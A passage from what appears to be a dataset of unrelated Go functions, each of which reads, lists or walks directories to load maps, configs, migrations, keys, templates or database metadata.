int32(y*32)))\n\t\t\t\tcase 'S':\n\t\t\t\t\tt = DirtFloor\n\t\t\t\t\tlevel.Monsters = append(level.Monsters, NewSpider(int32(x*32), int32(y*32)))\n\t\t\t\tcase 's':\n\t\t\t\t\tt = DirtFloor\n\t\t\t\t\tlevel.Items = append(level.Items, NewSword(Pos{int32(x * 32), int32(y * 32)}))\n\t\t\t\tcase 'h':\n\t\t\t\t\tt = DirtFloor\n\t\t\t\t\tlevel.Items = append(level.Items, NewHelmet(Pos{int32(x * 32), int32(y * 32)}))\n\t\t\t\tcase '@':\n\t\t\t\t\tt = DirtFloor\n\t\t\t\t\tlevel.Player.X, level.Player.Y, level.Player.Symbol, level.Player.Speed = int32(x*32), int32(y*32), '@', 3\n\t\t\t\t\tlevel.Player.Hitpoints, level.Player.Strength, level.Player.sightRange = 200, 4, 5\n\t\t\t\tcase 'u':\n\t\t\t\t\tt = StairUp\n\t\t\t\tcase 'd':\n\t\t\t\t\tt = StairDown\n\t\t\t\tdefault:\n\t\t\t\t\tpanic(\"undefined charecter in map\")\n\t\t\t\t}\n\t\t\t\tlevel.Map[y][x].Rune = t\n\t\t\t\tlevel.Map[y][x].Visible = false\n\t\t\t}\n\t\t}\n\t\textIndex := strings.LastIndex(filpth, \".map\")\n\t\tlastSlash := strings.LastIndex(filpth, \"\\\\\")\n\t\tlevelName := filpth[(lastSlash + 1):extIndex]\n\t\tlvls[levelName] = level\n\t}\n\t//level.lineOfSight(level.Player.Div32())\n\treturn lvls\n}", "func (dn *DNode) getDbFiles(clusterType string) map[string]string {\n\tdbfiles := map[string]string{}\n\n\tif fds, err := ioutil.ReadDir(fmt.Sprintf(\"%s/%s\", dn.dbPath, clusterType)); err == nil {\n\t\tfor _, f := range fds {\n\t\t\tdbfiles[fmt.Sprintf(\"%s/%s/%v\", dn.dbPath, clusterType, f.Name())] = f.Name()\n\t\t}\n\t}\n\n\treturn dbfiles\n}", "func (s *Store) loadAll() error {\n\tfiles, err := s.ListFiles(s.Dir)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Failed to list %s: %v\", s.Dir, err)\n\t}\n\n\tfor _, file := range files {\n\t\tfilepath := path.Join(s.Dir, file)\n\t\terr := s.loadPath(filepath)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Failed to load %s: %v\", filepath, err)\n\t\t}\n\t}\n\treturn nil\n}", "func LoadDir(dir string) ([]DirEntry, error) {\n\tvar dirEntries []DirEntry\n\n\terr := filepath.WalkDir(\n\t\tdir,\n\t\tfunc(path string, d os.DirEntry, err error) error {\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tfileInfo, err := d.Info()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\trelativePath, err := filepath.Rel(dir, path)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif relativePath == \".\" {\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tdirEntry := DirEntry{\n\t\t\t\tName: relativePath,\n\t\t\t\tPermissions: fileInfo.Mode().Perm(),\n\t\t\t}\n\n\t\t\tif !fileInfo.IsDir() {\n\t\t\t\t// Read file contents\n\t\t\t\tfileContent, err := os.ReadFile(path)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tdirEntry.Content = base64.StdEncoding.EncodeToString(fileContent)\n\t\t\t\tdirEntry.IsFile = true\n\t\t\t}\n\n\t\t\tdirEntries = append(dirEntries, dirEntry)\n\t\t\treturn nil\n\t\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn dirEntries, nil\n}", "func getFiles(dir string) (files map[string]struct{}, err error) {\n\tfiles = make(map[string]struct{})\n\n\tif dir == \"\" {\n\t\tdir = \"./\"\n\t}\n\n\terr = filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {\n\t\tfiles[path] = struct{}{}\n\t\treturn nil\n\t})\n\n\treturn\n}", "func loadPartials() (map[string]string, error) {\n\tg := make(map[string]string)\n\t//load resources from paths\n\tfor key, path := range paths {\n\t\tbody, err := ioutil.ReadFile(path)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tg[key] = string(body)\n\t}\n\treturn g, nil\n}", "func loadDirectory(dir string, callback func(*ParseData) error) error {\n\tglob := path.Join(dir, \"*.md\")\n\tdirEntries, err := filepath.Glob(glob)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlogrus.WithFields(logrus.Fields{\n\t\t\"glob\": glob,\n\t\t\"entries\": dirEntries,\n\t}).Debug(\"scanning directory\")\n\tfor _, entry := range dirEntries {\n\t\t// Parse file entry\n\t\tdata, err := parseFile(entry)\n\t\tif err != nil {\n\t\t\tlogrus.WithField(\"file\", entry).Warn(\"failed to parse\")\n\t\t\tcontinue\n\t\t}\n\n\t\terr = callback(data)\n\t\tif err != nil {\n\t\t\tlogrus.WithField(\"file\", entry).Warn(\"failed to callback\")\n\t\t\tcontinue\n\t\t}\n\t}\n\n\treturn nil\n}", "func Dir(dirname string) Source {\n\treturn SourceFunc(func() (map[string]string, error) {\n\t\tentries, err := ioutil.ReadDir(dirname)\n\t\tif os.IsNotExist(err) || os.IsPermission(err) {\n\t\t\treturn nil, nil\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tm := make(map[string]string, len(entries))\n\n\t\tfor _, entry := range entries {\n\t\t\tentryPath := filepath.Join(dirname, entry.Name())\n\t\t\tentryName := filepath.Base(entry.Name())\n\t\t\tfi, err := os.Stat(entryPath)\n\t\t\tif os.IsNotExist(err) || os.IsPermission(err) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif !fi.Mode().IsRegular() {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// ignore system files: .DS_Store\n\t\t\tif entryName == \".DS_Store\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif len(entryName) > 253 || !dirSourceEntryNameRE.MatchString(entryName) {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tdata, err := ioutil.ReadFile(entryPath)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\n\t\t\tm[entryName] = strings.TrimSpace(string(data))\n\t\t}\n\n\t\treturn m, nil\n\t})\n}", "func (r *Atomustache) loadLayouts() error {\n\n\tfiles, err := ioutil.ReadDir(r.LayoutsFolder)\n\tif err != nil {\n\t\treturn errors.New(\"Error reading layouts folder: \" + err.Error())\n\t}\n\n\tfor _, file := range files {\n\t\tif strings.HasSuffix(file.Name(), r.Ext) {\n\n\t\t\tk := noExt(file.Name())\n\t\t\tpath := r.LayoutsFolder + \"/\" + file.Name()\n\n\t\t\tv, fErr := ioutil.ReadFile(path)\n\t\t\tif fErr != nil {\n\t\t\t\treturn errors.New(\"Error reading file (\" + path + \"): \" + fErr.Error())\n\t\t\t}\n\n\t\t\tt, mErr := ParseString(string(v), nil)\n\t\t\tif mErr != nil {\n\t\t\t\treturn errors.New(\"Error parsing string for file (\" + path + \"): \" + mErr.Error())\n\t\t\t}\n\n\t\t\tr.Layouts[k] = t\n\t\t}\n\t}\n\n\treturn nil\n}", "func LoadAllResources(dir string) (map[string]*Resource, error) {\n\tresources := map[string]*Resource{}\n\terr := filepath.Walk(dir,\n\t\tfunc(path string, info os.FileInfo, err error) error {\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif info.IsDir() {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tif mime.TypeByExtension(filepath.Ext(path)) != \"\" {\n\t\t\t\tresource, err := LoadResource(path)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\troute, err := filepath.Rel(dir, path)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\tresources[\"/\"+route] = resource\n\t\t\t}\n\t\t\treturn nil\n\t\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resources, nil\n}", "func LoadDatasets(dbPath, key string) []*Dataset {\n\tvar datasets []*Dataset\n\n\tdirs, err := ioutil.ReadDir(dbPath)\n\tif err != nil {\n\t\tlog.Error(err.Error())\n\t\treturn datasets\n\t}\n\n\tfor _, dir := range dirs {\n\t\tif !strings.HasPrefix(dir.Name(), \".\") && dir.IsDir() {\n\t\t\tds := &Dataset{\n\t\t\t\tpath: filepath.Join(dbPath, dir.Name()),\n\t\t\t\tlastModified: dir.ModTime(),\n\t\t\t\tkey: key,\n\t\t\t}\n\n\t\t\tdatasets = append(datasets, ds)\n\t\t}\n\t}\n\treturn datasets\n}", "func LoadTemplates(dir string, basefile string) (*Templates, error) {\n\tt := &Templates{BaseDir: dir, BaseFile: basefile}\n\treturn t, t.Scan()\n}", "func LoadAllWObjs(folderPath string) (map[string]*WObj, error) {\n\tif folderPath[len(folderPath)-1:] != \"/\" {\n\t\tfolderPath += \"/\"\n\t}\n\tfiles, err := OSReadDir(folderPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar currentError error\n\tobjs := make(map[string]*WObj)\n\tnames := make([]string, 0)\n\tfor _, f := range files {\n\t\tn := strings.Split(f, \".\")[0]\n\t\tif !IsStringInList(n, names) {\n\t\t\tobj, err := GetWObjFromPath(n, folderPath+n)\n\t\t\tcurrentError = err\n\t\t\tnames = append(names, n)\n\t\t\tobjs[n] = obj\n\t\t}\n\t}\n\treturn objs, currentError\n}", "func GetLanguage(dir string) map[string]uint64 {\n\tvar langMap = make(map[string]uint64)\n\tfiles, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\tlog.Printf(\"read [%s] error, err = %s\\n\", dir, err)\n\t}\n\tfor _, file := range files {\n\t\tif file != nil && !file.IsDir() {\n\t\t\tvar ext = path.Ext(dir + file.Name())\n\t\t\tvar count, existed = langMap[ext]\n\t\t\tif existed {\n\t\t\t\tlangMap[ext] = count + 1\n\t\t\t} else {\n\t\t\t\tlangMap[ext] = 1\n\t\t\t}\n\t\t}\n\t}\n\treturn langMap\n}", "func readFileNames(dir string) (map[string][]string, error) {\n\tvar err error\n\tcharMap := make(map[string][]string)\n\tdirs, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn charMap, err\n\t}\n\tfor _, f := range dirs {\n\t\tchardir := dir + f.Name()\n\t\tcharMap[f.Name()] = []string{}\n\t\tsubDir, err := ioutil.ReadDir(chardir)\n\t\tif err != nil {\n\t\t\treturn charMap, err\n\t\t}\n\t\tfor _, subf := range subDir {\n\t\t\tcharDirImage := chardir + \"/\" + subf.Name()\n\t\t\tcharMap[f.Name()] = append(charMap[f.Name()], charDirImage)\n\t\t}\n\t}\n\n\treturn charMap, err\n}", "func ReloadAllTableInfo(ctx context.Context, filePath string) error {\n\tconf, err := getConfig(ctx, filePath)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, db := range conf.Databases {\n\t\tfor _, h := range conf.Hosts {\n\t\t\tif db.HostKey != h.Key {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\terr := openAdditional(ctx, h.User, h.Password, h.Address, db.Name, h.Port, h.Protocol)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\ttables, err := showtables(db.Name)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tdb.Tables = tables\n\t\t}\n\t}\n\n\treturn setConfig(ctx, conf, filePath)\n}", "func GetCfgMapData(subdir string) (map[string][]byte, error) {\n\tsubDir := fmt.Sprintf(\"%s/%s\", *(options.CfgDir), subdir)\n\tdata := map[string][]byte{}\n\tfiles, err := ioutil.ReadDir(subDir)\n\tif err != nil {\n\t\treturn data, err\n\t}\n\n\tfor _, file := range files {\n\t\tif file.IsDir() {\n\t\t\tcontinue\n\t\t}\n\t\tcontent, err := ioutil.ReadFile(fmt.Sprintf(\"%s/%s\", subDir, file.Name()))\n\t\tif err != nil {\n\t\t\treturn data, err\n\t\t}\n\n\t\tdata[file.Name()] = content\n\t}\n\n\treturn data, nil\n}", "func Initialize(basePath string) error {\n log(dtalog.DBG, \"Initialize(%q) called\", basePath)\n dir, err := os.Open(basePath)\n if err != nil {\n log(dtalog.ERR, \"Initialize(%q): error opening directory for read: %s\",\n basePath, err)\n return err\n }\n \n filez, err := dir.Readdirnames(0)\n if err != nil {\n log(dtalog.ERR, \"Initialize(%q): error reading from directory: %s\",\n basePath, err)\n dir.Close()\n return err\n }\n dir.Close()\n \n Paths = make([]string, 0, len(filez))\n Limbo = make(map[string]*string)\n \n for _, fname := range filez {\n pth := filepath.Join(basePath, fname)\n f, err := os.Open(pth)\n if err != nil {\n log(dtalog.WRN, \"Initialize(): error opening file %q: %s\", pth, err)\n continue\n }\n defer f.Close()\n log(dtalog.DBG, \"Initialize(): reading file %q\", pth)\n \n Paths = append(Paths, pth)\n cur_ptr := &(Paths[len(Paths)-1])\n \n dcdr := json.NewDecoder(f)\n var raw interface{}\n var raw_slice []interface{}\n var i ref.Interface\n var idx string\n for dcdr.More() {\n err = dcdr.Decode(&raw)\n if err != nil {\n log(dtalog.WRN, \"Initialize(): error decoding from file %q: %s\",\n pth, err)\n continue\n }\n raw_slice = raw.([]interface{})\n if len(raw_slice) < 2 {\n log(dtalog.WRN, \"Initialize(): in file %q: slice too short: %q\",\n pth, raw_slice)\n continue\n }\n \n idx = raw_slice[0].(string)\n i = ref.Deref(idx)\n if i == nil {\n Limbo[idx] = cur_ptr\n } else {\n i.(Interface).SetDescPage(cur_ptr)\n }\n }\n }\n return nil\n}", "func loadKeysFromDir(keyDir string) keypool.LoadKeysCallbackFunc {\n\treturn func(keypool *keypool.KeyPool) error {\n\t\tfiles, err := ioutil.ReadDir(keyDir)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor _, file := range files {\n\t\t\td, err := ioutil.ReadFile(filepath.Join(keyDir, file.Name()))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tloadKey, err := new(signkeys.PublicKey).Unmarshal(d)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tkeypool.LoadKey(loadKey) // ignore errors\n\t\t}\n\t\treturn nil\n\t}\n}", "func DirWalk(col []string, path string, files map[string][]string) {\n\tfis, err := ioutil.ReadDir(path)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, \"error reading directory '%s': %v\\n\", path, err)\n\t}\n\tfor _, fi := range fis {\n\t\tif fi.Name()[0] == '.' {\n\t\t\tcontinue\n\t\t}\n\t\tif fi.IsDir() {\n\t\t\tnpath := path + \"/\" + fi.Name()\n\t\t\tncol := CollectionName(col, npath)\n\t\t\tDirWalk(ncol, npath, files)\n\t\t\tcontinue\n\t\t}\n\t\tif !AllowedFile(fi.Name()) {\n\t\t\tcontinue\n\t\t}\n\t\tif len(col) == 0 {\n\t\t\tcontinue\n\t\t}\n\t\tname := path + \"/\" + fi.Name()\n\t\tfiles[name] = append(files[name], col...)\n\t}\n}", "func (e *engine) load() error {\n\tdatabaseNames, err := listDir(e.cfg.Dir)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor _, databaseName := range databaseNames {\n\t\t_, err := e.CreateDatabase(databaseName)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (DBM *DBManager) loadAllDatabases(path string) (err error) {\n\tdatabasesFiles, err := listDatabases(path)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor _, databaseFile := range databasesFiles {\n\t\tdb, err := data.LoadDatabase(filepath.Join(path, databaseFile.Name()))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tDBM.databases.Store(databaseFile.Name(), db)\n\t}\n\treturn nil\n}", "func getMigrations() *migrate.MemoryMigrationSource {\n\tsource := &migrate.MemoryMigrationSource{}\n\tfn := func(path string, f os.FileInfo, err error) error {\n\t\tif !f.IsDir() && strings.HasSuffix(f.Name(), \".sql\") {\n\t\t\tmigFile, err := os.Open(path)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tmig, err := migrate.ParseMigration(path, migFile)\n\t\t\tmigFile.Close()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsource.Migrations = append(source.Migrations, mig)\n\t\t}\n\t\treturn nil\n\t}\n\twd, _ := os.Getwd()\n\terr := filepath.Walk(filepath.Join(wd, \"migrations\"), fn)\n\tif err != nil {\n\t\tlog.Panic(err)\n\t\treturn nil\n\t}\n\treturn source\n}", "func (m *Migrator) Run() {\n\t// filename->key->val map\n\ti18nMultiMap := make(map[string]map[string]string)\n\n\t// run the workers to search for query\n\tfor _, src := range m.src {\n\t\tfilepath.Walk(src, func(path string, file os.FileInfo, err error) error {\n\t\t\tif !file.IsDir() {\n\t\t\t\tm.wg.Add(1)\n\t\t\t\tgo m.searchInFile(path)\n\t\t\t}\n\t\t\treturn nil\n\t\t})\n\t}\n\n\t// wait for workers and then close the result chan\n\tgo func() {\n\t\tm.wg.Wait()\n\t\tclose(m.result)\n\t}()\n\n\t// consume the result chan\n\tfor item := range m.result {\n\t\t_, ok := i18nMultiMap[item.filename]\n\t\tif !ok {\n\t\t\ti18nMultiMap[item.filename] = make(map[string]string)\n\t\t}\n\t\ti18nMultiMap[item.filename][item.key] = item.value\n\t}\n\n\t// write files\n\tfor filename, i18nMap := range i18nMultiMap {\n\t\tif len(i18nMap) == 0 {\n\t\t\tcontinue\n\t\t}\n\t\tf, err := os.Create(fmt.Sprintf(\"%s/%s\", m.dst, filename))\n\t\tdefer f.Close()\n\t\tcheck(err)\n\n\t\tfor _, key := range m.keys {\n\t\t\tif len(key) == 0 || strings.HasPrefix(key, \"#\") {\n\t\t\t\tf.WriteString(fmt.Sprintln(key))\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tval, ok := i18nMap[key]\n\t\t\tif ok {\n\t\t\t\tf.WriteString(fmt.Sprintln(val))\n\t\t\t}\n\t\t}\n\t}\n}", "func get_directories(cache *cache.Cache, db *dropbox.Dropbox, path string) []dropbox.Entry {\n\treturn get(cache, db, path, true)\n}", "func LoadIgnorePatterns(dir string, domain []string) ([]gitignore.Pattern, error) {\n\tps, err := ReadIgnoreFile(filepath.Join(dir, IgnoreFile), domain)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfis, err := os.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, fi := range fis {\n\t\tif fi.IsDir() && fi.Name() != \".git\" {\n\t\t\tvar subps []gitignore.Pattern\n\t\t\tsubps, err = LoadIgnorePatterns(filepath.Join(dir, fi.Name()), append(domain, fi.Name()))\n\t\t\tif len(subps) > 0 {\n\t\t\t\tps = append(ps, subps...)\n\t\t\t}\n\t\t}\n\t}\n\treturn ps, nil\n}", "func getImportPaths(folder, packageName string) (importPaths map[string]string) {\n\timportPaths = make(map[string]string)\n\n\tvar gip func(x, y string)\n\tgip = func(folder, packageName string) {\n\t\tif _, found := importPaths[packageName]; found {\n\t\t\treturn\n\t\t}\n\t\timportPaths[packageName] = folder\n\n\t\tinfo, err := os.Stat(folder)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tif info.IsDir() {\n\t\t\tf, _ := os.Open(folder)\n\t\t\tdefer f.Close()\n\t\t\tdn, _ := f.Readdirnames(-1)\n\t\t\tfor _, filename := range dn {\n\t\t\t\tif filename[0] == '.' {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfilename = filepath.Join(folder, filename)\n\t\t\t\tif strings.HasSuffix(filename, \".go\") {\n\t\t\t\t\tfset := token.NewFileSet()\n\t\t\t\t\tp, _ := parser.ParseFile(fset, filename, nil, parser.ImportsOnly)\n\t\t\t\t\tfor _, s := range p.Imports {\n\t\t\t\t\t\timportPackage, _ := strconv.Unquote(s.Path.Value)\n\t\t\t\t\t\tgopath := os.Getenv(\"GOPATH\")\n\t\t\t\t\t\timportPath := filepath.Join(gopath, \"src\", importPackage)\n\t\t\t\t\t\tgoroot := os.Getenv(\"GOROOT\")\n\t\t\t\t\t\timportRoot := filepath.Join(goroot, \"src\", \"pkg\", importPackage)\n\t\t\t\t\t\tif _, statErr := os.Stat(importPath); statErr == nil {\n\t\t\t\t\t\t\tgip(importPath, importPackage)\n\t\t\t\t\t\t} else if _, statErr := os.Stat(importRoot); statErr == nil {\n\t\t\t\t\t\t\tgip(importRoot, importPackage)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tgip(folder, packageName)\n\treturn\n}", "func generateSQLFiles(migrations map[string]string) (string, error) {\n\tbasepath := path.Join(os.TempDir(), \"db\", generator.ID(\"dbm\"))\n\t_, err := fileutil.EnsureDir(basepath, 0777)\n\n\tif nil != err {\n\t\treturn \"\", fmt.Errorf(\"Unable to create directory %s\\n%s\", basepath, err)\n\t}\n\n\tfor filename, data := range migrations {\n\t\tf, err := os.Create(path.Join(basepath, filename))\n\t\tif nil != err {\n\t\t\treturn \"\", fmt.Errorf(\"Unable to write %s to %s for database migrations\\n%s\", filename, basepath, err)\n\t\t}\n\t\tdefer f.Close()\n\t\tf.WriteString(data)\n\t}\n\n\treturn fmt.Sprintf(\"file://%s\", basepath), nil\n}", "func (l *FileConfig) List(path string) (map[string][]byte, error) {\n\tf := make(map[string][]byte)\n\t// path = strings.TrimPrefix(path, l.root)\n\t// dirs keeps track of all directories to be traversed\n\tdirs := list.New()\n\tdirs.PushBack(path)\n\tfor e := dirs.Front(); e != nil; e = e.Next() {\n\t\tcurPath := e.Value.(string)\n\t\tfiles, err := readDir(filepath.Join(l.root, curPath))\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"unable to load root %v, path %v, err %v\", l.root, e.Value, err)\n\t\t\treturn nil, err\n\t\t}\n\t\tfor _, file := range files {\n\t\t\t// file.Name() only shows the last element of whole path. Need to combine a full\n\t\t\t// path\n\t\t\tfp := filepath.Join(curPath, file.Name())\n\t\t\tif !file.IsDir() {\n\t\t\t\t// if whitelist isn't nil, see if the file is in whitelist.\n\t\t\t\tif l.whiteList != nil {\n\t\t\t\t\tif _, ok := l.whiteList[fp]; !ok {\n\t\t\t\t\t\tlog.Infof(\"path %s is ignored because of unchanged\", fp)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tf[fp], _ = l.Get(fp)\n\t\t\t} else {\n\t\t\t\tdirs.PushBack(fp)\n\t\t\t}\n\t\t}\n\t}\n\treturn f, nil\n}", "func LoadResFromFolder(path string) error {\n\tlog.Print(\"Loading resources from: \" + path)\n\tdir, err := ioutil.ReadDir(path)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, file := range dir {\n\t\tif file.IsDir() {\n\t\t\tcontinue\n\t\t}\n\n\t\tif _, err := LoadRes(filepath.Join(path, file.Name())); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}", "func ListDir(type_ string, user string) []map[string]string {\n\tuserDir := c.FileStore + \"/\" + glb.MD5Sum(user)\n\tglb.ReplaceRept(&userDir, \"/\")\n\tuserDir = strings.TrimRight(userDir, \"/\")\n\t\n\t//fmt.Println(userDir)\n\tif glb.FileExist(userDir) {\n\t\tos.Remove(userDir)\n\t}\n\tif !glb.DirExist(userDir) {\n\t\tos.MkdirAll(userDir+\"/plain\", 0775)\n\t\tos.MkdirAll(userDir+\"/secret/cache\", 0775)\n\t\tos.MkdirAll(userDir+\"/plain_share\", 0775)\n\t\tos.MkdirAll(userDir+\"/secret_share\", 0775)\n\t}\n\t\n\tvar (\n\t\tfileList []map[string]string\n\t\tdirToRead string\n\t)\n\tswitch type_ {\n\tcase \"plain\":\n\t\tdirToRead = userDir + \"/plain\"\n\t\tlist, _ := ioutil.ReadDir(dirToRead)\n\t\tfor _, file := range list {\n\t\t\tfileList = append(fileList, map[string]string{\n\t\t\t\t\"name\": file.Name(),\n\t\t\t\t\"size\": glb.ComputeSize(file.Size()),\n\t\t\t\t\"date\": file.ModTime().Format(\"2006-01-02 15:04:05\"),\n\t\t\t\t\"link\": \"\",\n\t\t\t})\n\t\t}\n\t\treturn fileList\n\tcase \"plain_share\":\n\t\tdirToRead = userDir + \"/plain_share\"\n\t\tlist, _ := ioutil.ReadDir(dirToRead)\n\t\tfor _, file := range list {\n\t\t\tfileList = append(fileList, map[string]string{\n\t\t\t\t\"name\": file.Name(),\n\t\t\t\t\"size\": glb.ComputeSize(file.Size()),\n\t\t\t\t\"date\": file.ModTime().Format(\"2006-01-02 15:04:05\"),\n\t\t\t\t\"link\": \"\",\n\t\t\t})\n\t\t}\n\t\treturn fileList\n\tcase \"secret\":\n\t\tdirToRead = userDir + \"/secret\"\n\t\tlist, _ := ioutil.ReadDir(dirToRead)\n\t\tfor _, file := range list {\n\t\t\tfileList = append(fileList, map[string]string{\n\t\t\t\t\"name\": file.Name(),\n\t\t\t\t\"size\": glb.ComputeSize(file.Size()),\n\t\t\t\t\"date\": file.ModTime().Format(\"2006-01-02 15:04:05\"),\n\t\t\t\t\"link\": \"\",\n\t\t\t})\n\t\t}\n\t\treturn fileList\n\t\n\tcase \"secret_share\":\n\t\treturn nil\n\t}\n\treturn nil\n}", "func (s *sqlStore) getDir(path string) (*Dir, error) {\n\tif path == \".\" {\n\t\tpath = \"\"\n\t}\n\n\thash := s.hash(path)\n\tlog.Debugf(\"hash(%s) == %s\", path, hash)\n\treturn s.getDirWithHash(hash)\n}", "func LoadDbMeta() error {\n\n\tif !Utils.Exists(FolderPosition) { //no folder\n\t\terr:=Utils.CreateDir(FolderPosition);\n\t\tif err!=nil {\n\t\t\treturn errors.New(\"无法创建根文件夹\")\n\t\t}\n\t\tf,err:= Utils.CreateFile(MiniSqlCatalogPos)\n\t\tdefer f.Close()\n\t\tif err!=nil {\n\t\t\treturn errors.New(\"无法创建索引文件\")\n\t\t}\n\t\tnewCatalog:=MiniSqlCatalog{}\n\t\twt:=msgp.NewWriter(f)\n\t\terr=newCatalog.EncodeMsg(wt)\n\t\treturn err\n\t} else if !Utils.Exists(MiniSqlCatalogPos) { //no minisql.meta\n\t\tf,err:= Utils.CreateFile(MiniSqlCatalogPos)\n\t\tdefer f.Close()\n\t\tif err!=nil {\n\t\t\treturn errors.New(\"无法创建索引文件\")\n\t\t}\n\t\tnewCatalog:=MiniSqlCatalog{}\n\t\twt:=msgp.NewWriter(f)\n\t\terr=newCatalog.EncodeMsg(wt)\n\t\treturn err\n\t}\n\t//have folder and minisql.meta\n\tf,err:=os.OpenFile(MiniSqlCatalogPos,os.O_RDWR,0666)\n\tdefer f.Close()\n\tif err!=nil{\n\t\treturn errors.New(\"根索引文件打开失败\")\n\t}\n\trd:=msgp.NewReader(f)\n\terr=minisqlCatalog.DecodeMsg(rd)\n\tif err!=nil {\n\t\treturn errors.New(\"根索引读取失败,请尝试重启系统\")\n\t}\n\treturn nil\n}", "func Load() {\n\tf, _ := os.Open(filepath.ToSlash(filepath.Join(model.Conf.StaticRoot, \"i18n\")))\n\tnames, _ := f.Readdirnames(-1)\n\tf.Close()\n\n\tfor _, name := range names {\n\t\tif !util.IsLetter(rune(name[0])) || !strings.HasSuffix(name, \".json\") {\n\t\t\tcontinue\n\t\t}\n\n\t\tloc := name[:strings.LastIndex(name, \".\")]\n\t\tload(loc)\n\t}\n\n\tlogger.Tracef(\"loaded [%d] language configuration files\", len(locales))\n}", "func Database() Source {\n\treturn SourceFunc(func() (map[string]string, error) {\n\t\tpwd, err := os.Getwd()\n\t\tif err != nil {\n\t\t\tpwd = \"/\"\n\t\t}\n\n\t\tvar sources []Source\n\n\t\t{\n\t\t\tconfigDir := filepath.Join(\"/etc/database\")\n\t\t\tfi, err := os.Stat(configDir)\n\t\t\tif err == nil && fi.IsDir() {\n\t\t\t\tsources = append([]Source{databaseDir(configDir)}, sources...)\n\t\t\t}\n\t\t\tif os.IsNotExist(err) || os.IsPermission(err) {\n\t\t\t\terr = nil\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t}\n\n\t\tfor {\n\t\t\tconfigDir := filepath.Join(pwd, \".config\")\n\t\t\tfi, err := os.Stat(configDir)\n\t\t\tif err == nil && fi.IsDir() {\n\t\t\t\tsources = append([]Source{databaseDir(configDir)}, sources...)\n\t\t\t}\n\t\t\tif os.IsNotExist(err) || os.IsPermission(err) {\n\t\t\t\terr = nil\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tif pwd == \"/\" {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tpwd = filepath.Dir(pwd)\n\t\t}\n\n\t\treturn Multi(sources...).Read()\n\t})\n}", "func parseLookup(dir string) (map[string]string, error) {\n\t// Read lookup directory for its files.\n\tfiles, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Insert lookup data into Regex Map.\n\trgxMap := make(map[string]string)\n\tfor _, file := range files {\n\t\tlookup, err := createLookup(path.Join(dir, file.Name()))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfor expect, rgx := range lookup {\n\t\t\trgxMap[expect] = rgx\n\t\t}\n\t}\n\n\treturn rgxMap, nil\n}", "func (m *migrations) getMigrations() (Migrations, error) {\n\tnames := m.fs.Files()\n\tmm := make(map[int64]*Migration)\n\tfor _, name := range names {\n\t\tfields := parseScriptName(name)\n\t\tif len(fields) == 0 {\n\t\t\treturn nil, errors.Errorf(\"Invalid migration name '%s' should be like 